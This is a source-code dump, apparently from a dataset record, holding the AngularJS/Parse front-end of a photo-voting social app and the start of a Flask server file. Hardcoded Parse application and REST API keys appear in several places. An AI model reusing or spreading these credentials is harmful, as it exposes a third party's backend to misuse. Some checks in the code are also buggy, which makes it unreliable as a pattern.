document.getElementById('LoadMore')\n\t\tLoadMore.style.display = 'none'\n\t\tvar promise = PostService.GetPosts($scope.posts)\n\t\tpromise.then(function(Data){\n\t\t\t// console.log(Data)\n\t\t LoadMore = document.getElementById('LoadMore')\n\t\t\tLoadMore.style.display = 'block'\n\t\t\tspinner.style.display = \"none\"\n\t\t})\n\t}\n\t$scope.Punch = function(index,which){\n\t\t\tvar current_user = Parse.User.current()\n\t\t\tvar objectId = $scope.posts[index].id;\n\n\t\t\t\t\tParse.Cloud.run(\"TapTap\", {which:which,userObjID:current_user.id,objectId:objectId},{\n\t\t\t\t\t\tsuccess:function(response) {\n\t\t\t\t\t\t\t// console.log(JSON.stringify(response));\n if(which==1)\n {\n response.set('isVoted1',\"block\")\n response.set(\"isVoted2\",\"none\")\n }else {\n response.set('isVoted2',\"block\")\n response.set(\"isVoted1\",\"none\")\n }\n\n\t\t\t\t\t\t\t$scope.posts[index] = response\n\t\t\t\t\t\t\t$scope.$apply()\n\t\t\t\t\t\t},\n\t\t\t\t\t\terror : function(error) {\n\t\t\t\t\t\t\t// console.log(error);\n\t\t\t\t\t\t}\n\t\t\t\t\t})\n\t\t}\n\n$scope.PostComment=function(){\n\tvar objectId = $scope.objectId\n\tvar CommentObj = Parse.Object.extend(\"Comment\")\n\tvar Comment = new CommentObj();\n\tvar Post = {\n\t__type: 'Pointer',\n\tclassName: 'Posts',\n\tobjectId: objectId\n\t}\n\tComment.set(\"User\",Parse.User.current())\n\tComment.set(\"Post\",Post)\n\tComment.set(\"comment\",$scope.cc)\n\tif($scope.cc != null && $scope.cc !=\"undefined\")\n\t{\n\tComment.save()\n\t$scope.comments.push(Comment)\n\t$scope.cc = null\n\t// $scope.$apply();\n\tMaterialize.toast('Comment Added successfully', 4000)\n\t}\n\telse {\n\t\tMaterialize.toast('Comment cannot be null', 4000)\n\t}\n}\n\nfunction GetComments(objectId)\n{\n\t\t\t$scope.objectId = objectId\n\t\t\tvar Comment = Parse.Object.extend(\"Comment\")\n\t\t\tvar CommentQuery = new Parse.Query(Comment);\n\t\t\tvar Post = {\n\t\t\t__type: 'Pointer',\n\t\t\tclassName: 'Posts',\n\t\t\tobjectId: objectId\n\t\t\t}\n\t\t\tCommentQuery.equalTo(\"Post\",Post)\n\t\t\tCommentQuery.find({\n\t\t\t\tsuccess : function (Comments) {\n\t\t\t\t\t\tfor(var i=0;i<Comments.length;i++)\n\t\t\t\t\t\t{\n\t\t\t\t\t\t\tvar User = Comments[i].get(\"User\",Parse.User.current())\n\t\t\t\t\t\t\tUser.fetch()\n\t\t\t\t\t\t}\n\t\t\t\t\t\tif(Comments.length == 0)\n\t\t\t\t\t\t{\n\t\t\t\t\t\t\t$scope.youFirst = true\n\t\t\t\t\t\t}\n\t\t\t\t\t\telse\n\t\t\t\t\t\t{\n\t\t\t\t\t\t\t$scope.youFirst = false\n\t\t\t\t\t\t}\n\t\t\t\t\t\t$scope.comments = Comments\n\t\t\t\t\t\t$scope.$apply()\n\t\t\t\t},\n\t\t\t\terror : function (error) {\n\t\t\t\t\t// console.log(error);\n\t\t\t\t}\n\t\t\t})\n}\n\nfunction detectmob() {\n if( navigator.userAgent.match(/Android/i)\n || navigator.userAgent.match(/webOS/i)\n || navigator.userAgent.match(/iPhone/i)\n || navigator.userAgent.match(/iPad/i)\n || navigator.userAgent.match(/iPod/i)\n || navigator.userAgent.match(/BlackBerry/i)\n || navigator.userAgent.match(/Windows Phone/i)\n ){\n return true;\n }\n else {\n return false;\n }\n}\n\n\n})\n\n\napp.controller(\"CreatePunch\",function($scope,$filter){\n $scope.validLength = 50;\n $scope.validTitleLength = 20;\n var intrestQuery = new Parse.Query('Intrestlist')\n intrestQuery.find({\n success:function(Interests){\n //console.log(Interests);\n var list = [];\n for(var i=0;i<Interests.length;i++)\n {\n list.push(Interests[i].get('IntrestText'))\n }\n $scope.Interests = list;\n }\n })\n\t$scope.punchit = function(){\n\t\t\t\tvar wait = document.getElementById(\"wait\")\n\t\t\t\tvar PunchModel = document.getElementById(\"PunchModel\")\n\n var InterestsArray = []\n var cboxes = $('.Interests');\n var len = cboxes.length;\n //console.log(cboxes);\n var InterestsArray = [];\n $.each($(\"input[class='Interests']:checked\"), function(){\n InterestsArray.push($(this).val());\n });\n\n\n\t\t\t\tvar Title = $scope.Title;\n\t\t\t\tvar Image1 = $('#Image1')[0]; //File1\n\t\t\t\tvar Image2 = $('#Image2')[0]; //File2\n\t\t\t\tvar Image1Title = $scope.Image1Title;\n\t\t\t\tvar Image2Title = $scope.Image2Title;\n\t\t\t\tParse.initialize(\"Y4Txek5e5lKnGzkArbcNMVKqMHyaTk3XR6COOpg4\", \"fR1P17QhE9b7PKOa1wXozi0yo8IAlYLSIzqYh4EU\");\n\t\t\t\tvar current_user = Parse.User.current()\n\t\t\t\tvar Image1File,Image2File;\n\t\t\t\tvar PostObject = Parse.Object.extend('Posts')\n\t\t\t\tvar Post = new PostObject();\n\t\t\t\tvar Communites = $scope.Communites\n // console.log(InterestsArray);\n // alert(Image1.files[0].size / 1000000)\n\tif(Image1.files[0].size / 1000000 > 5 || Image2.files[0] / 1000000 > 5)\n {\n var $toastContent = $('<span>File size cannot be larger than 3 mbs</span>');\n\t\t\t\t\tMaterialize.toast($toastContent, 5000);\n }\n else if(Image1.files.length > 0 && Image2.files.length > 0 && Image1Title != null && Image2Title != null && InterestsArray.length > 0 && Title != null)\n\t\t\t\t{\n wait.style.display = \"block\"\n\t Image1File = new Parse.File(\"Image1.png\",Image1.files[0])\n\t Image2File = new Parse.File(\"Image2.png\",Image2.files[0])\n var quality = 20\n // output file format (jpg || png)\n output_format = 'jpg'\n //This function returns an Image Object\n //console.log(Image1.files[0]);\n // console.log($('#Preview1').attr('src'));\n var image = new Image();\n image.src = $('#Preview1').attr('src');\n\n var image1 = new Image();\n image1.src = $('#Preview2').attr('src');\n\n var target_img = jic.compress(image,quality,output_format).src;\n var target_img1 = jic.compress(image1,quality,output_format).src;\n console.log(target_img1);\n Image1File = new Parse.File(\"Image1\",{base64:target_img})\n Image2File = new Parse.File(\"Image2\",{base64:target_img1})\n // console.log({base64:target_img});\n\t\t\t\t\t\tPost.set(\"Title\",Title);\n\t\t\t\t\t\tPost.set(\"Image1\",Image1File);\n\t\t\t\t\t\tPost.set(\"Image2\",Image2File);\n\t\t\t\t\t\tPost.set(\"By\",current_user);\n\t\t\t\t\t\tPost.set(\"Image1Title\",Image1Title);\n\t\t\t\t\t\tPost.set(\"Image2Title\",Image2Title);\n\t\t\t\t\t\tPost.set(\"Punchers1\",new Array())\n\t\t\t\t\t\tPost.set(\"Punchers2\",new Array())\n\t\t\t\t\t\t// var InterestsArray = Communites.split(\",\");\n\t\t\t\t\t\tPost.set(\"TargetIntrests\",InterestsArray);\n\t\t\t\t\t\tPost.save(null,{\n\t\t\t\t\t\t\tsuccess : function (Post) {\n\t\t\t\t\t\t\t\t\t\t$('#PunchModel').closeModal();\n\t\t\t\t\t\t\t\t\t\tvar $toastContent = $('<span> Posted successfully</span>');\n\t\t\t\t\t\t\t\t\t\tMaterialize.toast($toastContent, 5000);\n $('#CreatePunch').load(document.URL + ' #CreatePunch');\n location.reload();\n\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\terror: function (error) {\n\t\t\t\t\t\t\t\tvar $toastContent = $('<span>'+String(error)+'</span>');\n\t\t\t\t\t\t\t\tMaterialize.toast($toastContent, 5000);\n wait.style.display = \"none\"\n location.reload();\n\t\t\t\t\t\t\t}\n\t\t\t\t\t\t});\n }\n\t\t\t\telse\n\t\t\t\t{\n\t\t\t\t\tvar $toastContent = $('<span>Please check and fill all the fields</span>');\n\t\t\t\t\tMaterialize.toast($toastContent, 5000);\n\t\t\t\t}\n }\n\t\t\t// }\n});\n\nfunction uniq(a) {\n return a.sort().filter(function(item, pos, ary) {\n return !pos || item != ary[pos - 1];\n })\n}\n\n\napp.controller('DetailsController',function($scope,$http,Data) {\n\n\n\nfunction detectmob() {\n\t if( navigator.userAgent.match(/Android/i)\n\t || navigator.userAgent.match(/webOS/i)\n\t || navigator.userAgent.match(/iPhone/i)\n\t || navigator.userAgent.match(/iPad/i)\n\t || navigator.userAgent.match(/iPod/i)\n\t || navigator.userAgent.match(/BlackBerry/i)\n\t || navigator.userAgent.match(/Windows Phone/i)\n ){\n\t\t\treturn true;\n\t\t}\n\t else {\n\t\t\treturn false;\n\t\t}\n\t}\n\n\tif(!detectmob())\n\t{\n\t\t$scope.width = \"100%\";\n\t\t$scope.blur_img = \"width:90%;margin-left:6%;margin-top:-10px; height:480px\";\n\t\t$scope.dp = \"width:15%\";\n\t\t$scope.follow_div = \"right:170px;height:30px; width:100px;margin-top:-110px;float:right\";\n\t\t$scope.color = \"red\"\n\t\t$scope.ffp_full = \"width:90%;margin-left:6%;margin-top:2%;\";\n\t\t$scope.follower = \"width:50px; height:10px; padding-top:2px\";\n\t\t$scope.divider1 = \"width:2px;margin-top:10px; height:70px\";\n\t\t$scope.following = \"null\";\n\t\t$scope.divider2 = \"width:2px;margin-top:10px; height:70px\";\n\t}\n\telse {\n\t\t$scope.width=\"70%\"\n\t\t$scope.blur_img = \"width:100%;margin-left:6%;margin-top:-10px; height:480px\";\n\t\t$scope.dp = \"width:20%\";\n\t\t$scope.follow_div = \"margin-left:35%;height:30px;float:left;\";\n\t\t$scope.color = \"red\"\n\t\t$scope.ffp_full = \"width:100%;margin-left:5%;\";\n\t\t$scope.follower = \"\";\n\t\t$scope.divider1 = \"width:2px;margin-top:10px; height:70px;\";\n\t\t$scope.following = \"\";\n\t\t$scope.divider2 = \"width:2px;margin-top:10px; height:70px;\";\n\t}\n\n\n\tvar params = {};\n\tvar User = null;\n\tif (location.search) {\n\t\t\tvar parts = location.search.substring(1).split('&');\n\n\t\t\tfor (var i = 0; i < parts.length; i++) {\n\t\t\t\t\tvar nv = parts[i].split('=');\n\t\t\t\t\tif (!nv[0]) continue;\n\t\t\t\t\tparams[nv[0]] = nv[1] || true;\n\t\t\t}\n\t}\n\tvar objectId = params.id\n\tif(objectId == Parse.User.current().id || objectId == null)\n\t{\n\tUser = Parse.User.current()\n\t$scope.Name = Parse.User.current().get(\"Name\")\n\t$scope.Ninja_name = Parse.User.current().get(\"Ninja_name\")\n\t$scope.ProfilePicture = Parse.User.current().get(\"ProfilePicture\").url()\n\tvar Follow = document.getElementById('Follow')\n\t$scope.display = 'none'\n\t}\n\telse {\n\t\tUser = new Parse.User();\n\t\tUser.id = objectId\n\t\tUser.fetch({\n\t\t\tsuccess : function (usr) {\n\t\t\t\t// console.log(\"----Name ==\" + usr.get(\"Name\"))\n\t\t\t\t$scope.Name = User.get(\"Name\")\n\t\t\t\t$scope.Ninja_name = User.get(\"Ninja_name\")\n\t\t\t\t$scope.ProfilePicture = User.get(\"ProfilePicture\").url()\n\t\t\t}\n\t\t})\n\t\tCheckIfIamFollowing()\n\t\t$scope.display = 'block'\n\t}\n\n\t// $(\"#ProfilePicture\").load(function() {\n\t// \tvar img = document.getElementById('ProfilePicture')\n\t// \txi=new XMLHttpRequest();\n\t// \txi.open(\"GET\",img.src,true);\n\t// \txi.send();\n\t//\n\t// xi.onreadystatechange=function() {\n\t// if(xi.readyState==4 && xi.status==200) {\n\t// img=new Image;\n\t// img.onload=function(){\n\t//\n\t// }\n\t// img.src=xi.responseText;\n\t// }\n\t// }\n\t// })\n\n\n\t$scope.isFollowing = \"Please wait ..\"\n\tGetFollowers()\n\tGetFollowing()\n\t$scope.Data = Data\n\tfunction GetFollowers()\n\t{\n\t$scope.Posts = Data.Value\n\tvar FollowObject = Parse.Object.extend(\"FollowList\")\n\tvar GetFollowersQuery = new Parse.Query(FollowObject)\n\tGetFollowersQuery.equalTo(\"Following\",User)\n\tGetFollowersQuery.find({\n\t\tsuccess : function (Followers) {\n\t\t\t// console.log(Followers.length);\n\t\t\t$scope.Followers = Followers.length\n\t\t\t$scope.$apply()\n\t\t}\n\t})\n\t}\n\tfunction GetFollowing()\n\t{\n\tvar FollowObject = Parse.Object.extend(\"FollowList\")\n\tvar GetFollowingQuery = new Parse.Query(FollowObject)\n\tGetFollowingQuery.equalTo(\"Follower\",User)\n\tGetFollowingQuery.find({\n\t\tsuccess : function (Following) {\n\t\t\tconsole.log(Following.length);\n\t\t\t$scope.Following = Following.length\n\t\t\t$scope.$apply()\n\t\t}\n\t})\n\t}\n\n\t$scope.FollowUnfollowAction = function()\n\t{\n\t\tvar FollowType = Parse.Object.extend(\"FollowList\")\n\t\tvar FollowObject = new FollowType();\n\t\tFollowObject.set(\"Follower\",Parse.User.current())\n\t\tFollowObject.set(\"Following\",User)\n\t\tFollowObject.set(\"FollowingName\",User.get(\"Name\"))\n\t\tif($scope.isFollowing == \"Follow\")\n\t\t{\n\t\t\tFollowObject.save({success : function(Object) {\n\t\t\t\t$scope.objectIdOfFollowObject = Object.id\n\t\t\t}})\n\t\t\t$scope.isFollowing = \"Unfollow\"\n\t\t\t$scope.icon = \"Follwing\"\n\t\t\t$scope.Followers += 1\n\t\t}\n\t\telse {\n\t\t\tFollowObject = new FollowType();\n\t\t\tvar Query = new Parse.Query(FollowType);\n\t\t\tQuery.equalTo(\"objectId\",$scope.objectIdOfFollowObject)\n\t\t\tQuery.find({\n\t\t\t\tsuccess:function(Objects) {\n\t\t\t\t\tObjects[0].destroy()\n\t\t\t\t}\n\t\t\t})\n\n\t\t\t$scope.isFollowing = \"Follow\"\n\t\t\t$scope.icon = \"+Follow\"\n\t\t\t$scope.Followers -= 1\n\t\t}\n\t}\n\nfunction CheckIfIamFollowing()\n{\n\tvar FollowObject = Parse.Object.extend(\"FollowList\")\n\tvar GetFollowingQuery = new Parse.Query(FollowObject)\n\tGetFollowingQuery.equalTo(\"Follower\",Parse.User.current())\n\tGetFollowingQuery.find({\n\t\tsuccess : function (Following) {\n\t\t\tif(Following.length == 0)\n\t\t\t{\n\t\t\t\t$scope.isFollowing = \"Follow\"\n\t\t\t\t$scope.icon = \"+Follow\"\n\t\t\t}\n\t\t\tfor(var i=0;i<Following.length;i++)\n\t\t\t{\n\t\t\t\t// Unfollow : remove\n\t\t\t\t// Follow : person_add\n\t\t\t\t// console.log(\"Follower = \" + Following[i].get(\"Follower\").id + \"Following =\" + Following[i].get(\"Following\").id);\n\t\t\t\tif(Following[i].get(\"Follower\").id == Parse.User.current().id && Following[i].get(\"Following\").id == User.id)\n\t\t\t\t{\n\t\t\t\t\t// console.log(\"Yahh is Following\");\n\t\t\t\t\t$scope.isFollowing = \"UnFollow\";\n\t\t\t\t\t$scope.icon = \"-UnFollow\"\n\t\t\t\t\t$scope.objectIdOfFollowObject = Following[i].id;\n\t\t\t\t}\n\t\t\t\telse {\n\t\t\t\t\t$scope.isFollowing = \"Follow\"\n\t\t\t\t\t$scope.icon = \"+Follow\"\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t})\n}\n\n})\n\napp.controller('UserPunchesController',function($scope,$http,Data) {\n\n\tfunction detectmob() {\n\t if( navigator.userAgent.match(/Android/i)\n\t || navigator.userAgent.match(/webOS/i)\n\t || navigator.userAgent.match(/iPhone/i)\n\t || navigator.userAgent.match(/iPad/i)\n\t || navigator.userAgent.match(/iPod/i)\n\t || navigator.userAgent.match(/BlackBerry/i)\n\t || navigator.userAgent.match(/Windows Phone/i)\n\t ){\n\t return true;\n\t }\n\t else {\n\t return false;\n\t }\n\n\t}\n\n\tif(detectmob())\n\t{\n\t\t$scope.width = \"100%\";\n\t}\n\telse {\n\t\t$scope.width=\"70%\"\n\t\t$scope.pcmargin = \"16%\"\n\t}\n\n\n\tvar params = {};\n\tvar User = null\n\tif (location.search) {\n\t var parts = location.search.substring(1).split('&');\n\n\t for (var i = 0; i < parts.length; i++) {\n\t var nv = parts[i].split('=');\n\t if (!nv[0]) continue;\n\t params[nv[0]] = nv[1] || true;\n\t }\n\t}\n\tvar objectId = params.id\n\tif(objectId == Parse.User.current() || objectId == null)\n\t{\n\t\tUser = Parse.User.current();\n\t}\n\telse {\n\t\tUser = new Parse.User();\n\t\tUser.id = objectId\n\t\tUser.fetch()\n\t}\n\n\t$scope.posts = new Array()\n\t$scope.PostsVisibility = true\n\t$scope.openComment = function(index) {\n\t\t// console.log(\"df\");\n\t\t$('#modal1').openModal();\n\t\tGetComments($scope.posts[index].id)\n\n\t}\n\t$scope.LoadMore = function () {\n\t\t// console.log(\"clicked\");\n\t\t// spinner\n\t\tvar spinner = document.getElementById('spinner')\n\t\tspinner.style.display = 'block'\n\t\tGetPosts()\n\t}\n\n\tParse.initialize(\"Y4Txek5e5lKnGzkArbcNMVKqMHyaTk3XR6COOpg4\", \"fR1P17QhE9b7PKOa1wXozi0yo8IAlYLSIzqYh4EU\");\n\t$http.get('/GetSessionToken')\n\t.then(function(response) {\n\t\t// console.log(response.data);\n\tParse.User.become(response.data)\n\tGetPosts()\n\t})\n\n\t$scope.Punch = function(index,which){\n\t\t\tvar current_user = Parse.User.current()\n\t\t\tvar objectId = $scope.posts[index].id;\n\n\t\t\t\t\tParse.Cloud.run(\"TapTap\", {which:which,userObjID:current_user.id,objectId:objectId},{\n\t\t\t\t\t\tsuccess:function(response) {\n\t\t\t\t\t\t\t// console.log(JSON.stringify(response));\n\t\t\t\t\t\t\t$scope.posts[index] = response\n\t\t\t\t\t\t\t$scope.$apply()\n\t\t\t\t\t\t},\n\t\t\t\t\t\terror : function(error) {\n\t\t\t\t\t\t\t// console.log(error);\n\t\t\t\t\t\t}\n\t\t\t\t\t})\n\t\t}\n\nfunction GetPosts(hashTag)\n{\n\t\tvar posts = Parse.Object.extend(\"Posts\")\n\t\tvar Query = new Parse.Query(posts)\n\n\n\t\tQuery.equalTo(\"By\",User)\n\n\t\tif($scope.posts.length > 0){\n\t\t\t// console.log(\"load more\");\n\t\t\tvar ExistingObjectIds=new Array();\n\t\t\tfor(var i=0;i<$scope.posts.length;i++)\n\t\t\t{\n\t\t\t\t// console.log($scope.posts[i].id);\n\t\t\t\tExistingObjectIds[i] = $scope.posts[i].id;\n\t\t\t}\n\t\t\t// console.log(ExistingObjectIds);\n\t\t\tQuery.notContainedIn(\"objectId\",ExistingObjectIds)\n\t\t}\n\t\tQuery.descending(\"createdAt\")\n\t\tQuery.find({\n\t\t\tsuccess : function (data) {\n\t\t\t\t\tData.Value = data.length\n\t\t\t\t\tif(data !=null && data != 'undefined'){\n\t\t\t\t\t\t// $scope.posts=data\n\t\t\t\t\t\t// console.log(typeof($scope.post));\n\t\t\t\t\t\tfor(var i=0;i<data.length;i++)\n\t\t\t\t\t\t{\n\t\t\t\t\t\t\tvar SinglePost = data[i];\n\t\t\t\t\t\t\t// console.log(JSON.stringify(SinglePost));\n\t\t\t\t\t\t\tSinglePost.Image1Title = SinglePost.get(\"Image1Title\")\n\t\t\t\t\t\t\tSinglePost.Image2Title = SinglePost.get(\"Image2Title\")\n var createdAt = SinglePost.get('createdAt')\n\t\t\t\t\t\t\tvar timeStamp = GetTimeStamp(createdAt)\n\t\t\t\t\t\t\tSinglePost.set('TimeStamp',timeStamp);\n\t\t\t\t\t\t\tSinglePost.set(\"Votes1\",SinglePost.get('Punchers1').length)\n\t\t\t\t\t\t\tSinglePost.set(\"Votes2\",SinglePost.get('Punchers2').length)\n\n\t\t\t\t\t\t\tvar user = SinglePost.get('By')\n\t\t\t\t\t\t\tuser.fetch({\n\t\t\t\t\t\t\t\tsuccess:function(myObject) {\n\t\t\t\t\t\t\t\t\tconsole.log(JSON.stringify(myObject));\n\t\t\t\t\t\t\t\t}\n\t\t\t\t\t\t\t});\n if(SinglePost.get('Votes1') > 0 || SinglePost.get('Votes2') > 0)\n {\n if(SinglePost.get('Punchers1').indexOf(Parse.User.current().id) > -1)\n {\n SinglePost.set('isVoted1',\"block\")\n SinglePost.set('isVoted2',\"none\")\n // alert(SinglePost.Image1Title + SinglePost.Image2Title + \" = isVoted1 = \" + SinglePost.get('isVoted1') + \" isVoted2 = \" + SinglePost.get('isVoted2'));\n }\n\n else if(SinglePost.get('Punchers2').indexOf(Parse.User.current().id) > -1)\n {\n SinglePost.set('isVoted1',\"none\")\n SinglePost.set('isVoted2',\"block\")\n // alert(SinglePost.Image1Title + SinglePost.Image2Title + \" = isVoted1 = \" + SinglePost.get('isVoted1') + \" isVoted2 = \" + SinglePost.get('isVoted2'));\n }\n else {\n SinglePost.set('isVoted1',\"none\")\n SinglePost.set('isVoted2',\"none\")\n }\n }\n else {\n SinglePost.set('isVoted1',\"none\")\n SinglePost.set('isVoted2',\"none\")\n }\n\t\t\t\t\t\t\t$scope.posts.push(SinglePost)\n\t\t\t\t\t\t}\n\t\t\t\t\t\t$scope.PostsVisibility = false;\n\t\t\t\t\t\t//spinner\n\t\t\t\t\t\tvar spinner = document.getElementById('spinner')\n\t\t\t\t\t\tspinner.style.display = 'none'\n\t\t\t\t\t\t$scope.$apply()\n\t\t\t\t\t\t// console.log($scope.posts.length);\n\t\t\t\t\t}\n\t\t\t\t\telse {\n\t\t\t\t\t\t// console.log(\"null\");\n\t\t\t\t\t}\n\t\t\t},\n\t\t\terror : function (error) {\n\t\t\t\t// console.log(error);\n\t\t\t}\n\t\t})\n}\n\nfunction GetTimeStamp(createdAt)\n{\n\tvar currentDate = new Date()\n\tvar Time;\n\tif(Math.abs(currentDate.getMonth() - createdAt.getMonth()) == 0)\n\t{\n\t\tif(Math.abs(currentDate.getDay() - createdAt.getDay()) > 7)\n\t\t{\n\t\t\tTime = String(parseInt(Math.abs(currentDate.getDay() - createdAt.getDay())) / 7 ) + \"W\"\n\t\t}\n\t\telse if (Math.abs(currentDate.getDay() - createdAt.getDay()) > 0)\n\t\t{\n\t\t\tTime = String(Math.abs(currentDate.getDay() - createdAt.getDay())) + \"d\"\n\t\t}\n\t\telse if (Math.abs(currentDate.getHours() - createdAt.getHours()) > 0){\n\t\t\tTime = String(Math.abs(currentDate.getHours() - createdAt.getHours())) + \"h\"\n\t\t}\n\t\telse {\n\t\t{\n\t\t\t\t\tTime = String(Math.abs(currentDate.getMinutes() - createdAt.getMinutes())) + 'm'\n\t\t}\n\t\t}\n\t}\n\telse {\n\t\tTime = String(Math.abs(currentDate.getMonth() - createdAt.getMonth())) + 'M'\n\t}\n\treturn Time;\n}\n\n$scope.PostComment=function(){\n\tvar objectId = $scope.objectId\n\tvar CommentObj = Parse.Object.extend(\"Comment\")\n\tvar Comment = new CommentObj();\n\tvar Post = {\n\t__type: 'Pointer',\n\tclassName: 'Posts',\n\tobjectId: objectId\n\t}\n\tComment.set(\"User\",Parse.User.current())\n\tComment.set(\"Post\",Post)\n\tComment.set(\"comment\",$scope.cc)\n\tif($scope.cc != null && $scope.cc !=\"undefined\")\n\t{\n\tComment.save()\n\t$scope.comments.push(Comment)\n\t$scope.cc = null\n\t$scope.$apply();\n\tMaterialize.toast('Comment Added successfully', 4000)\n\t}\n\telse {\n\t\tMaterialize.toast('Comment cannot be null', 4000)\n\t}\n}\n\nfunction GetComments(objectId)\n{\n\t\t\t$scope.objectId = objectId\n\t\t\tvar Comment = Parse.Object.extend(\"Comment\")\n\t\t\tvar CommentQuery = new Parse.Query(Comment);\n\t\t\tvar Post = {\n\t\t\t__type: 'Pointer',\n\t\t\tclassName: 'Posts',\n\t\t\tobjectId: objectId\n\t\t\t}\n\t\t\tCommentQuery.equalTo(\"Post\",Post)\n\t\t\tCommentQuery.find({\n\t\t\t\tsuccess : function (Comments) {\n\t\t\t\t\t\tfor(var i=0;i<Comments.length;i++)\n\t\t\t\t\t\t{\n\t\t\t\t\t\t\tvar User = Comments[i].get(\"User\",Parse.User.current())\n\t\t\t\t\t\t\tUser.fetch()\n\t\t\t\t\t\t}\n\t\t\t\t\t\tif(Comments.length < 0)\n\t\t\t\t\t\t{\n\t\t\t\t\t\t\t$scope.youFirst = false\n\t\t\t\t\t\t}\n\t\t\t\t\t\telse\n\t\t\t\t\t\t{\n\t\t\t\t\t\t\t$scope.youFirst = true\n\t\t\t\t\t\t}\n\t\t\t\t\t\t$scope.comments = Comments\n\t\t\t\t\t\t$scope.$apply()\n\t\t\t\t},\n\t\t\t\terror : function (error) {\n\t\t\t\t\t// console.log(error);\n\t\t\t\t}\n\t\t\t})\n}\n\nfunction detectmob() {\n if( navigator.userAgent.match(/Android/i)\n || navigator.userAgent.match(/webOS/i)\n || navigator.userAgent.match(/iPhone/i)\n || navigator.userAgent.match(/iPad/i)\n || navigator.userAgent.match(/iPod/i)\n || navigator.userAgent.match(/BlackBerry/i)\n || navigator.userAgent.match(/Windows Phone/i)\n ){\n return true;\n }\n else {\n return false;\n }\n}\n})\n\napp.controller('share',['$scope','PostService','Time',function($scope,PostService,Time) {\n init();\n function init()\n {\n \tif(location.href.split('/').indexOf(\"share\") != -1)\n {\n var objectId = location.href.split('/')[location.href.split('/').indexOf(\"share\") + 1]\n //console.log(objectId)\n //console.log(objectId);\n Parse.initialize(\"Y4Txek5e5lKnGzkArbcNMVKqMHyaTk3XR6COOpg4\", \"fR1P17QhE9b7PKOa1wXozi0yo8IAlYLSIzqYh4EU\");\n var posts = Parse.Object.extend(\"Posts\")\n var Query = new Parse.Query(posts)\n Query.equalTo(\"objectId\",objectId)\n Query.include(\"_User\")\n Query.descending(\"createdAt\")\n Query.limit(5);\n Query.find({\n success : function (data) {\n if(data !=null && data != 'undefined')\n {\n for(var i=0;i<data.length;i++)\n {\n var SinglePost = data[i];\n SinglePost.Image1Title = SinglePost.get(\"Image1Title\")\n SinglePost.Image2Title = SinglePost.get(\"Image2Title\")\n var user = SinglePost.get('By')\n user.fetch({\n success:function(myObject) {\n var createdAt = SinglePost.get('createdAt')\n var timeStamp = Time.GetTimeStamp(createdAt)\n SinglePost.set('TimeStamp',timeStamp);\n SinglePost.set(\"Votes1\",SinglePost.get('Punchers1').length)\n SinglePost.set(\"Votes2\",SinglePost.get('Punchers2').length)\n $scope.SinglePost = SinglePost\n //console.log($scope.SinglePost)\n $scope.$apply()\n }\n });\n\n }\n\n }\n },\n error : function (error) {\n \n }\n })\n }\n //}\n }\n}]);\n\napp.directive('myEnter', function () {\n return function (scope, element, attrs) {\n element.bind(\"keydown keypress\", function (event) {\n if(event.which === 13) {\n scope.$apply(function (){\n scope.$eval(attrs.myEnter);\n });\n\n event.preventDefault();\n }\n });\n };\n});\n\napp.directive('wmBlock', function ($parse) {\n return {\n scope: {\n wmBlockLength: '='\n },\n link: function (scope, elm, attrs) {\n\n elm.bind('keypress', function(e){\n\n if(elm[0].value.length > scope.wmBlockLength){\n e.preventDefault();\n return false;\n }\n });\n }\n }\n});\n\napp.config(['$interpolateProvider', function($interpolateProvider) {\n $interpolateProvider.startSymbol('{a');\n $interpolateProvider.endSymbol('a}');\n}])\n" }, { "alpha_fraction": 0.682009756565094, "alphanum_fraction": 0.6914516687393188, "avg_line_length": 27.37799072265625, "blob_id": "bbd5774b2cea381c06eb92f5e673f2ee4c8b5592", "content_id": "d94be2f9bf013010d76b485f73f5c444ddaa1458", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5931, "license_type": "no_license", "max_line_length": 108, "num_lines": 209, "path": "/hello.py", "repo_name": "smitthakkar96/Punchit.io_website_master", "src_encoding": "UTF-8", "text": "from parse_rest.user import User\nimport settings_local\nfrom flask import Flask,request,redirect, url_for ,render_template,send_from_directory,session,make_response\nfrom parse_rest.connection import SessionToken, register\nfrom parse_rest.datatypes import Function\nimport json,httplib\nimport os\nfrom flask.ext.triangle import Form,Triangle\nfrom flask.ext.triangle.widgets.standard import TextInput\nfrom datetime import timedelta\nfrom flask import session, app\nimport os\nimport pusher\nimport getPost\nfrom flask import Blueprint\n\nsettings_local.initParse()\napp = Flask(__name__)\nTriangle(app)\napp.config['UPLOAD_FOLDER'] = 'uploads/'\n\nHackathon = Blueprint('Hackathon', __name__,\n template_folder='templates',subdomain=\"hack404\")\napp.register_blueprint(Hackathon)\n\n\[email protected]_request\ndef make_session_permanent():\n session.permanent = True\n app.permanent_session_lifetime = timedelta(minutes=46440)\n\[email protected]('/',methods=['GET', 'POST'])\ndef index():\n #\tsettings_local.initParse()\n\t# if request.method == 'POST' and request.form[\"what\"]== 'Login':\n\t# \ttry:\n\t# \t\tprint request.form[\"password\"]\n\t# \t\tu = User.login(request.form[\"username\"],request.form[\"password\"])\n\t# \t\tsession['session_token'] = u.sessionToken\n\t# \t\tresp = make_response(render_template(\"index.html\"))\n\t# \t\treturn resp\n\t# \texcept:\n\t# \t\treturn render_template('login.html',error=\"Invalid username or password\")\n\t# elif request.method == 'POST' and request.form[\"what\"]=='SignUp':\n\t# \temail = request.form[\"email\"]\n\t# \tpassword = request.form[\"password\"]\n\t# \tninja = request.form[\"ninja\"]\n\t# \tbirthdate = request.form[\"birthdate\"]\n\t# \tu = User.signup(email,password)\n\t# \tu.email=email\n\t# \tu.save()\n\t# \t# proPic.save(os.path.join(app.config['UPLOAD_FOLDER']),\"userdp.png\")\n\t\t# connection = httplib.HTTPSConnection('api.parse.com', 443)\n\t\t# connection.connect()\n\t\t# connection.request('POST', '/1/files/profilePic.png', open('userdp.png', 'rb').read(), {\n\t\t# \"X-Parse-Application-Id\": \"${Y4Txek5e5lKnGzkArbcNMVKqMHyaTk3XR6COOpg4}\",\n\t\t# \"X-Parse-REST-API-Key\": \"${nJOJNtVr1EvNiyjo6F6M8zfiUdzv8lPx31FBHiwO}\",\n\t\t# \"Content-Type\": \"image/png\"\n\t\t# })\n\t\t# result = json.loads(connection.getresponse().read())\n\t\t# print result\n\t\t# connection.request('POST', '/1/classes/_User', json.dumps({\n\t\t# \"username\": email,\n\t\t# \"picture\": {\n\t\t# \"name\": \"profilePic.png\",\n\t\t# \"__type\": \"File\"\n\t\t# }\n\t\t# }), 